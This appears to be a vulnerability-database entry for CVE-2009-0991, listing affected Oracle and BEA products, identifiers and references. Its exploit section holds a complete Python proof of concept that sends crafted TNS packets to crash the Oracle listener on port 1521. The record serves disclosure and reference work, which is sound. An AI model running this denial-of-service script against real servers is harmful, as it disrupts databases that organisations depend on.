Details of VAR-E-200904-0196

ID

VAR-E-200904-0196

CVE

cve_id:	CVE-2009-0991	Trust: 2.4
cve_id:	CVE-2009-0981	Trust: 0.8
cve_id:	CVE-2009-0992	Trust: 0.3
cve_id:	CVE-2009-0973	Trust: 0.3
cve_id:	CVE-2009-1016	Trust: 0.3
cve_id:	CVE-2009-1011	Trust: 0.3
cve_id:	CVE-2009-0994	Trust: 0.3
cve_id:	CVE-2009-1000	Trust: 0.3
cve_id:	CVE-2009-1017	Trust: 0.3
cve_id:	CVE-2009-0997	Trust: 0.3
cve_id:	CVE-2009-1005	Trust: 0.3
cve_id:	CVE-2009-0999	Trust: 0.3
cve_id:	CVE-2009-0993	Trust: 0.3
cve_id:	CVE-2009-1013	Trust: 0.3
cve_id:	CVE-2009-0975	Trust: 0.3
cve_id:	CVE-2009-0989	Trust: 0.3
cve_id:	CVE-2009-1006	Trust: 0.3
cve_id:	CVE-2009-0984	Trust: 0.3
cve_id:	CVE-2009-0986	Trust: 0.3
cve_id:	CVE-2009-0190	Trust: 0.3
cve_id:	CVE-2009-0977	Trust: 0.3
cve_id:	CVE-2009-0995	Trust: 0.3
cve_id:	CVE-2009-0980	Trust: 0.3
cve_id:	CVE-2009-1010	Trust: 0.3
cve_id:	CVE-2009-1012	Trust: 0.3
cve_id:	CVE-2009-0998	Trust: 0.3
cve_id:	CVE-2009-0978	Trust: 0.3
cve_id:	CVE-2009-1003	Trust: 0.3
cve_id:	CVE-2009-0976	Trust: 0.3
cve_id:	CVE-2009-0988	Trust: 0.3
cve_id:	CVE-2009-0974	Trust: 0.3
cve_id:	CVE-2009-1002	Trust: 0.3
cve_id:	CVE-2009-0979	Trust: 0.3
cve_id:	CVE-2009-1004	Trust: 0.3
cve_id:	CVE-2009-1008	Trust: 0.3
cve_id:	CVE-2009-0972	Trust: 0.3
cve_id:	CVE-2009-0982	Trust: 0.3
cve_id:	CVE-2009-0996	Trust: 0.3
cve_id:	CVE-2009-1014	Trust: 0.3
cve_id:	CVE-2009-0189	Trust: 0.3
cve_id:	CVE-2009-1009	Trust: 0.3
cve_id:	CVE-2009-1001	Trust: 0.3
cve_id:	CVE-2009-0990	Trust: 0.3
cve_id:	CVE-2009-0983	Trust: 0.3
cve_id:	CVE-2009-0985	Trust: 0.3

sources: BID: 34461 // PACKETSTORM: 76855 // PACKETSTORM: 76731 // EXPLOIT-DB: 8507 // EDBNET: 32724

EDB ID

8507

TITLE

Oracle RDBms 10.2.0.3/11.1.0.6 - TNS Listener (PoC) - Windows dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 8507

DESCRIPTION

Oracle RDBms 10.2.0.3/11.1.0.6 - TNS Listener (PoC). CVE-53737CVE-2009-0991 . dos exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 8507

AFFECTED PRODUCTS

vendor:	oracle	model:	rdbms	scope:	eq	version:	10.2.0.3/11.1.0.6	Trust: 1.6
vendor:	oracle	model:	oracle11g standard edition	scope:	eq	version:	11.16	Trust: 0.6
vendor:	bea	model:	systems weblogic server	scope:	eq	version:	10.3	Trust: 0.6
vendor:	bea	model:	systems weblogic server	scope:	eq	version:	10.0	Trust: 0.6
vendor:	oracle	model:	rdbms tns listener	scope:	-	version:	-	Trust: 0.5
vendor:	apex	model:	password hash	scope:	-	version:	-	Trust: 0.5
vendor:	oracle	model:	xml publisher	scope:	eq	version:	10.1.3.2.1	Trust: 0.3
vendor:	oracle	model:	xml publisher	scope:	eq	version:	5.6.2	Trust: 0.3
vendor:	oracle	model:	xml publisher	scope:	eq	version:	10.1.3.2	Trust: 0.3
vendor:	oracle	model:	weblogic server	scope:	eq	version:	10.3	Trust: 0.3
vendor:	oracle	model:	peoplesoft enterprise peopletools	scope:	eq	version:	8.49	Trust: 0.3
vendor:	oracle	model:	peoplesoft enterprise hrms	scope:	eq	version:	9.0	Trust: 0.3
vendor:	oracle	model:	peoplesoft enterprise hrms	scope:	eq	version:	8.9	Trust: 0.3
vendor:	oracle	model:	outside in sdk html export	scope:	eq	version:	8.3	Trust: 0.3
vendor:	oracle	model:	outside in sdk html export	scope:	eq	version:	8.2.2	Trust: 0.3
vendor:	oracle	model:	oracle9i standard edition .8dv	scope:	eq	version:	9.2	Trust: 0.3
vendor:	oracle	model:	oracle9i standard edition	scope:	eq	version:	9.2.8	Trust: 0.3
vendor:	oracle	model:	oracle9i personal edition .8dv	scope:	eq	version:	9.2	Trust: 0.3
vendor:	oracle	model:	oracle9i personal edition	scope:	eq	version:	9.2.8	Trust: 0.3
vendor:	oracle	model:	oracle9i enterprise edition .8dv	scope:	eq	version:	9.2	Trust: 0.3
vendor:	oracle	model:	oracle9i enterprise edition	scope:	eq	version:	9.2.8.0	Trust: 0.3
vendor:	oracle	model:	oracle11g standard edition one	scope:	eq	version:	11.16	Trust: 0.3
vendor:	oracle	model:	oracle11g enterprise edition	scope:	eq	version:	11.16	Trust: 0.3
vendor:	oracle	model:	oracle11g enterprise edition	scope:	eq	version:	11.1.0.7	Trust: 0.3
vendor:	oracle	model:	oracle10g standard edition	scope:	eq	version:	10.2.3	Trust: 0.3
vendor:	oracle	model:	oracle10g standard edition	scope:	eq	version:	10.1.5	Trust: 0.3
vendor:	oracle	model:	oracle10g standard edition	scope:	eq	version:	10.2.0.4	Trust: 0.3
vendor:	oracle	model:	oracle10g personal edition	scope:	eq	version:	10.2.3	Trust: 0.3
vendor:	oracle	model:	oracle10g personal edition	scope:	eq	version:	10.1.5	Trust: 0.3
vendor:	oracle	model:	oracle10g personal edition	scope:	eq	version:	10.2.0.4	Trust: 0.3
vendor:	oracle	model:	oracle10g enterprise edition	scope:	eq	version:	10.2.3	Trust: 0.3
vendor:	oracle	model:	oracle10g enterprise edition	scope:	eq	version:	10.1.5	Trust: 0.3
vendor:	oracle	model:	oracle10g enterprise edition	scope:	eq	version:	10.2.0.4	Trust: 0.3
vendor:	oracle	model:	oracle10g application server	scope:	eq	version:	10.1.2	Trust: 0.3
vendor:	oracle	model:	oracle10g application server	scope:	eq	version:	10.1.2.3.0	Trust: 0.3
vendor:	oracle	model:	jrockit r27.6.2	scope:	-	version:	-	Trust: 0.3
vendor:	oracle	model:	jrockit r27.6.0	scope:	-	version:	-	Trust: 0.3
vendor:	oracle	model:	jrockit r27.1.0	scope:	-	version:	-	Trust: 0.3
vendor:	oracle	model:	e-business suite 11i	scope:	eq	version:	11.5.10.2	Trust: 0.3
vendor:	oracle	model:	e-business suite	scope:	eq	version:	12.0.6	Trust: 0.3
vendor:	oracle	model:	data service integrator	scope:	eq	version:	10.3	Trust: 0.3
vendor:	oracle	model:	bi publisher	scope:	eq	version:	10.1.3.4	Trust: 0.3
vendor:	oracle	model:	bi publisher	scope:	eq	version:	10.1.3.3.3	Trust: 0.3
vendor:	oracle	model:	bi publisher	scope:	eq	version:	10.1.3.3.2	Trust: 0.3
vendor:	oracle	model:	bi publisher	scope:	eq	version:	10.1.3.3.1	Trust: 0.3
vendor:	oracle	model:	bi publisher	scope:	eq	version:	10.1.3.3.0	Trust: 0.3
vendor:	oracle	model:	audit vault	scope:	eq	version:	10.2.3	Trust: 0.3
vendor:	oracle	model:	aqualogic data services platform	scope:	eq	version:	3.0.1	Trust: 0.3
vendor:	oracle	model:	aqualogic data services platform	scope:	eq	version:	3.2	Trust: 0.3
vendor:	oracle	model:	aqualogic data services platform	scope:	eq	version:	3.0	Trust: 0.3
vendor:	bea	model:	systems weblogic server sp	scope:	eq	version:	8.16	Trust: 0.3
vendor:	bea	model:	systems weblogic server sp	scope:	eq	version:	8.15	Trust: 0.3
vendor:	bea	model:	systems weblogic server sp	scope:	eq	version:	8.14	Trust: 0.3
vendor:	bea	model:	systems weblogic server sp	scope:	eq	version:	8.13	Trust: 0.3
vendor:	bea	model:	systems weblogic server sp	scope:	eq	version:	8.12	Trust: 0.3
vendor:	bea	model:	systems weblogic server sp	scope:	eq	version:	8.11	Trust: 0.3
vendor:	bea	model:	systems weblogic server	scope:	eq	version:	8.1	Trust: 0.3
vendor:	bea	model:	systems weblogic server sp	scope:	eq	version:	7.0.0.14	Trust: 0.3
vendor:	bea	model:	systems weblogic server sp	scope:	eq	version:	7.0.0.13	Trust: 0.3
vendor:	bea	model:	systems weblogic server sp	scope:	eq	version:	7.0.0.12	Trust: 0.3
vendor:	bea	model:	systems weblogic server sp	scope:	eq	version:	7.0.0.11	Trust: 0.3
vendor:	bea	model:	systems weblogic server	scope:	eq	version:	7.0.0.1	Trust: 0.3
vendor:	bea	model:	systems weblogic server sp	scope:	eq	version:	7.07	Trust: 0.3
vendor:	bea	model:	systems weblogic server sp	scope:	eq	version:	7.06	Trust: 0.3
vendor:	bea	model:	systems weblogic server sp	scope:	eq	version:	7.05	Trust: 0.3
vendor:	bea	model:	systems weblogic server sp	scope:	eq	version:	7.04	Trust: 0.3
vendor:	bea	model:	systems weblogic server sp	scope:	eq	version:	7.03	Trust: 0.3
vendor:	bea	model:	systems weblogic server sp	scope:	eq	version:	7.02	Trust: 0.3
vendor:	bea	model:	systems weblogic server sp	scope:	eq	version:	7.01	Trust: 0.3
vendor:	bea	model:	systems weblogic server	scope:	eq	version:	7.0	Trust: 0.3
vendor:	bea	model:	systems weblogic server maintenance pack	scope:	eq	version:	9.2	Trust: 0.3
vendor:	bea	model:	systems weblogic server	scope:	eq	version:	9.2	Trust: 0.3
vendor:	bea	model:	systems weblogic server	scope:	eq	version:	9.1	Trust: 0.3
vendor:	bea	model:	systems weblogic server	scope:	eq	version:	9.0	Trust: 0.3
vendor:	bea	model:	systems weblogic server sp7	scope:	eq	version:	7.0	Trust: 0.3
vendor:	bea	model:	systems weblogic server mp1	scope:	eq	version:	10.0	Trust: 0.3
vendor:	bea	model:	systems weblogic portal sp6	scope:	eq	version:	8.1	Trust: 0.3
vendor:	bea	model:	systems weblogic portal sp5	scope:	eq	version:	8.1	Trust: 0.3
vendor:	bea	model:	systems weblogic portal sp4	scope:	eq	version:	8.1	Trust: 0.3
vendor:	bea	model:	systems weblogic portal sp3	scope:	eq	version:	8.1	Trust: 0.3
vendor:	bea	model:	systems weblogic portal sp2	scope:	eq	version:	8.1	Trust: 0.3
vendor:	bea	model:	systems weblogic portal sp1	scope:	eq	version:	8.1	Trust: 0.3
vendor:	bea	model:	systems weblogic portal	scope:	eq	version:	8.1	Trust: 0.3

sources: BID: 34461 // PACKETSTORM: 76855 // PACKETSTORM: 76731 // EXPLOIT-DB: 8507 // EDBNET: 32724

EXPLOIT

# TNS Listener (Oracle RDBMS) exploit, cause trap in Listener process
# (more precisely: in function memcpy() called from ncrfintn() function which is located in oranro11.dll)

# Successfully working with Oracle RDBMS Win32 11.1.0.6.0 and Oracle RDBMS Win32 10.2.0.3 with latest CPU patches applied

# Vulnerability discovered by Dennis Yurichev <dennis@conus.info>

# Fixed in CPUapr2009, CVE-2009-0991
# http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html

from sys import *
from socket import *

sockobj = socket(AF_INET, SOCK_STREAM)

sockobj.connect ((argv[1], 1521))

sockobj.send(
"\x00\x68\x00\x00\x01\x00\x00\x00\x01\x3A\x01\x2C\x00\x00\x20\x00"
"\x7F\xFF\xC6\x0E\x00\x00\x01\x00\x00\x2E\x00\x3A\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x43\x4F\x4E\x4E\x45"
"\x43\x54\x5F\x44\x41\x54\x41\x3D\x28\x43\x4F\x4D\x4D\x41\x4E\x44"
"\x3D\x73\x65\x72\x76\x69\x63\x65\x5F\x72\x65\x67\x69\x73\x74\x65"
"\x72\x5F\x4E\x53\x47\x52\x29\x29")

data=sockobj.recv(102400)

sockobj.send(
"\x02\xde\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x02\xd4\x20\x08"
"\xff\x03\x01\x00\x12\x34\x34\x34\x34\x34\x78\x10\x10\x32\x10\x32"
"\x10\x32\x10\x32\x10\x32\x54\x76\x00\x78\x10\x32\x54\x76\x44\x00"
"\x00\x80\x02\x00\x00\x00\x00\x04\x00\x00\x70\xe4\xa5\x09\x90\x00"
"\x23\x00\x00\x00\x42\x45\x43\x37\x36\x43\x32\x43\x43\x31\x33\x36"
"\x2d\x35\x46\x39\x46\x2d\x45\x30\x33\x34\x2d\x30\x30\x30\x33\x42"
"\x41\x31\x33\x37\x34\x42\x33\x03\x00\x65\x00\x01\x00\x01\x00\x00"
"\x00\x00\x00\x00\x00\x00\x64\x02\x00\x80\x05\x00\x00\x00\x00\x04"
"\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00"
"\x00\x00\x84\xc3\xcc\x07\x01\x00\x00\x00\x84\x2f\xa6\x09\x00\x00"
"\x00\x00\x44\xa5\xa2\x09\x25\x98\x18\xe9\x28\x50\x4f\x28\xbb\xac"
"\x15\x56\x8e\x68\x1d\x6d\x05\x00\x00\x00\xfc\xa9\x36\x22\x0f\x00"
"\x00\x00\x60\x30\xa6\x09\x0a\x00\x00\x00\x64\x00\x00\x00\x00\x00"
"\x00\x00\xaa\x00\x00\x00\x00\x01\x00\x00\x17\x00\x00\x00\x78\xc3"
"\xcc\x07\x6f\x72\x63\x6c\x00\x28\x48\x4f\x53\x54\x3d\x77\x69\x6e"
"\x32\x30\x30\x33\x29\x00\x01\x00\x00\x00\x09\x00\x00\x00\x01\x00"
"\x00\x00\x50\xc5\x2f\x22\x02\x00\x00\x00\x34\xc5\x2f\x22\x00\x00"
"\x00\x00\x9c\xc5\xcc\x07\x6f\x72\x63\x6c\x5f\x58\x50\x54\x00\x09"
"\x00\x00\x00\x50\xc5\x2f\x22\x04\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x34\xc5\xcc\x07\x6f\x72\x63\x6c\x5f"
"\x58\x50\x54\x00\x01\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00"
"\x84\xc5\x2f\x22\x02\x00\x00\x00\x68\xc5\x2f\x22\x00\x00\x00\x00"
"\xa4\xa5\xa2\x09\x6f\x72\x63\x6c\x00\x05\x00\x00\x00\x84\xc5\x2f"
"\x22\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\xfc\xc4\xcc\x07\x6f\x72\x63\x6c\x00\x01\x00\x00\x00\x10\x00"
"\x00\x00\x02\x00\x00\x00\xbc\xc3\xcc\x07\x00\x00\x00\x00\xb0\x2f"
"\xa6\x09\x00\x00\x00\x00\x00\x00\x00\x00\x89\xc0\xb1\xc3\x08\x1d"
"\x46\x6d\xb6\xcf\xd1\xdd\x2c\xa7\x66\x6d\x0a\x00\x00\x00\x78\x2b"
"\xbc\x04\x7f\x00\x00\x00\x64\xa7\xa2\x09\x0d\x00\x00\x00\x20\x2c"
"\xbc\x04\x11\x00\x00\x00\x95\x00\x00\x00\x02\x20\x00\x80\x03\x00"
"\x00\x00\x98\xc5\x2f\x22\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00"
"\x00\x00\xb0\xc3\xcc\x07\x44\x45\x44\x49\x43\x41\x54\x45\x44\x00"
"\x28\x41\x44\x44\x52\x45\x53\x53\x3d\x28\x50\x52\x4f\x54\x4f\x43"
"\x4f\x4c\x3d\x42\x45\x51\x29\x28\x50\x52\x4f\x47\x52\x41\x4d\x3d"
"\x43\x3a\x5c\x61\x70\x70\x5c\x41\x64\x6d\x69\x6e\x69\x73\x74\x72"
"\x61\x74\x6f\x72\x5c\x70\x72\x6f\x64\x75\x63\x74\x5c\x31\x31\x2e"
"\x31\x2e\x30\x5c\x64\x62\x5f\x31\x5c\x62\x69\x6e\x5c\x6f\x72\x61"
"\x63\x6c\x65\x2e\x65\x78\x65\x29\x28\x41\x52\x47\x56\x30\x3d\x6f"
"\x72\x61\x63\x6c\x65\x6f\x72\x63\x6c\x29\x28\x41\x52\x47\x53\x3d"
"\x27\x28\x4c\x4f\x43\x41\x4c\x3d\x4e\x4f\x29\x27\x29\x29\x00\x4c"
"\x4f\x43\x41\x4c\x20\x53\x45\x52\x56\x45\x52\x00\x68\xc5\x2f\x22"
"\x34\xc5\x2f\x22\x00\x00\x00\x00\x05\x00\x00\x00\x84\xc5\x2f\x22"
"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\xfc\xc4\xcc\x07\x6f\x72\x63\x6c\x00\x09\x00\x00\x00\x50\xc5\x2f"
"\x22\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x34\xc5\xcc\x07\x6f\x72\x63\x6c\x5f\x58\x50\x54\x00"
)

sockobj.close()

# milw0rm.com [2009-04-21]

Trust: 1.0

sources: EXPLOIT-DB: 8507

EXPLOIT LANGUAGE

Trust: 0.6

sources: EXPLOIT-DB: 8507

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 8507

TYPE

TNS Listener (PoC)

Trust: 1.0

sources: EXPLOIT-DB: 8507

CREDITS

Dennis Yurichev

Trust: 0.6

sources: EXPLOIT-DB: 8507

EXTERNAL IDS

db:	NVD	id:	CVE-2009-0991	Trust: 2.4
db:	EXPLOIT-DB	id:	8507	Trust: 1.6
db:	NVD	id:	CVE-2009-0988	Trust: 0.9
db:	NVD	id:	CVE-2009-0981	Trust: 0.8
db:	EDBNET	id:	68211	Trust: 0.6
db:	EDBNET	id:	32724	Trust: 0.6
db:	PACKETSTORM	id:	76855	Trust: 0.5
db:	PACKETSTORM	id:	76731	Trust: 0.5
db:	ZDI	id:	ZDI-09-017	Trust: 0.3
db:	NVD	id:	CVE-2009-0992	Trust: 0.3
db:	NVD	id:	CVE-2009-0973	Trust: 0.3
db:	NVD	id:	CVE-2009-1016	Trust: 0.3
db:	NVD	id:	CVE-2009-1011	Trust: 0.3
db:	NVD	id:	CVE-2009-0994	Trust: 0.3
db:	NVD	id:	CVE-2009-1000	Trust: 0.3
db:	NVD	id:	CVE-2009-1017	Trust: 0.3
db:	NVD	id:	CVE-2009-0997	Trust: 0.3
db:	NVD	id:	CVE-2009-1005	Trust: 0.3
db:	NVD	id:	CVE-2009-0999	Trust: 0.3
db:	NVD	id:	CVE-2009-0993	Trust: 0.3
db:	NVD	id:	CVE-2009-1013	Trust: 0.3
db:	NVD	id:	CVE-2009-0975	Trust: 0.3
db:	NVD	id:	CVE-2009-0989	Trust: 0.3
db:	NVD	id:	CVE-2009-1006	Trust: 0.3
db:	NVD	id:	CVE-2009-0984	Trust: 0.3
db:	NVD	id:	CVE-2009-0986	Trust: 0.3
db:	NVD	id:	CVE-2009-0190	Trust: 0.3
db:	NVD	id:	CVE-2009-0977	Trust: 0.3
db:	NVD	id:	CVE-2009-0995	Trust: 0.3
db:	NVD	id:	CVE-2009-0980	Trust: 0.3
db:	NVD	id:	CVE-2009-1010	Trust: 0.3
db:	NVD	id:	CVE-2009-1012	Trust: 0.3
db:	NVD	id:	CVE-2009-0998	Trust: 0.3
db:	NVD	id:	CVE-2009-0978	Trust: 0.3
db:	NVD	id:	CVE-2009-1003	Trust: 0.3
db:	NVD	id:	CVE-2009-0976	Trust: 0.3
db:	NVD	id:	CVE-2009-0974	Trust: 0.3
db:	NVD	id:	CVE-2009-1002	Trust: 0.3
db:	NVD	id:	CVE-2009-0979	Trust: 0.3
db:	NVD	id:	CVE-2009-1004	Trust: 0.3
db:	NVD	id:	CVE-2009-1008	Trust: 0.3
db:	NVD	id:	CVE-2009-0972	Trust: 0.3
db:	NVD	id:	CVE-2009-0982	Trust: 0.3
db:	NVD	id:	CVE-2009-0996	Trust: 0.3
db:	NVD	id:	CVE-2009-1014	Trust: 0.3
db:	NVD	id:	CVE-2009-0189	Trust: 0.3
db:	NVD	id:	CVE-2009-1009	Trust: 0.3
db:	NVD	id:	CVE-2009-1001	Trust: 0.3
db:	NVD	id:	CVE-2009-0990	Trust: 0.3
db:	NVD	id:	CVE-2009-0983	Trust: 0.3
db:	NVD	id:	CVE-2009-0985	Trust: 0.3
db:	BID	id:	34461	Trust: 0.3

sources: BID: 34461 // PACKETSTORM: 76855 // PACKETSTORM: 76731 // EXPLOIT-DB: 8507 // EDBNET: 68211 // EDBNET: 32724

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2009-0991	Trust: 2.1
url:	https://www.intelligentexploit.com	Trust: 0.6
url:	https://www.exploit-db.com/exploits/8507/	Trust: 0.6
url:	https://nvd.nist.gov/vuln/detail/cve-2009-0981	Trust: 0.5
url:	http://www.zerodayinitiative.com/advisories/zdi-09-017/	Trust: 0.3
url:	http://www.red-database-security.com/advisory/oracle_sql_injection_dbms_aqin.html	Trust: 0.3
url:	http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html	Trust: 0.3
url:	http://secunia.com/secunia_research/2009-22/	Trust: 0.3
url:	http://secunia.com/secunia_research/2009-23/	Trust: 0.3
url:	http://www.oracle.com/technology/deploy/security/wls-security/1016.html	Trust: 0.3
url:	http://www.oracle.com/technology/deploy/security/wls-security/1012.html	Trust: 0.3
url:	http://www.red-database-security.com/advisory/apex_password_hashes.html	Trust: 0.3
url:	http://www.oracle.com/technology/deploy/security/wls-security/1004.html	Trust: 0.3
url:	http://www.oracle.com/technology/deploy/security/wls-security/1002.html	Trust: 0.3
url:	http://www.oracle.com/technology/deploy/security/wls-security/1006.html	Trust: 0.3
url:	http://www.oracle.com/technology/deploy/security/wls-security/1003.html	Trust: 0.3
url:	http://www.appsecinc.com/resources/alerts/oracle/2009-03.shtml	Trust: 0.3
url:	http://www.oracle.com/technology/deploy/security/wls-security/1001.html	Trust: 0.3
url:	http://www.oracle.com/technology/deploy/security/wls-security/1005.html	Trust: 0.3
url:	http://www.oracle.com	Trust: 0.3
url:	http://www.red-database-security.com/advisory/oracle_sql_injection_dbms_aqadm_sys.html	Trust: 0.3

sources: BID: 34461 // PACKETSTORM: 76855 // PACKETSTORM: 76731 // EXPLOIT-DB: 8507 // EDBNET: 68211 // EDBNET: 32724

SOURCES

db:	BID	id:	34461
db:	PACKETSTORM	id:	76855
db:	PACKETSTORM	id:	76731
db:	EXPLOIT-DB	id:	8507
db:	EDBNET	id:	68211
db:	EDBNET	id:	32724

LAST UPDATE DATE

2022-07-27T09:19:54.415000+00:00

SOURCES UPDATE DATE

db:

BID

id:

34461

date:

2009-09-01T16:22:00

SOURCES RELEASE DATE

db:	BID	id:	34461	date:	2009-04-09T00:00:00
db:	PACKETSTORM	id:	76855	date:	2009-04-21T18:08:37
db:	PACKETSTORM	id:	76731	date:	2009-04-16T21:55:38
db:	EXPLOIT-DB	id:	8507	date:	2009-04-21T00:00:00
db:	EDBNET	id:	68211	date:	2009-08-28T00:00:00
db:	EDBNET	id:	32724	date:	2009-04-21T00:00:00

tag:	exploit	Trust: 1.0
tag:	proof of concept	Trust: 0.5
tag:	info disclosure	Trust: 0.5

ID

CVE

EDB ID

TITLE

DESCRIPTION

AFFECTED PRODUCTS

EXPLOIT

EXPLOIT LANGUAGE

PRICE

TYPE

TAGS

CREDITS

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

SOURCES UPDATE DATE

SOURCES RELEASE DATE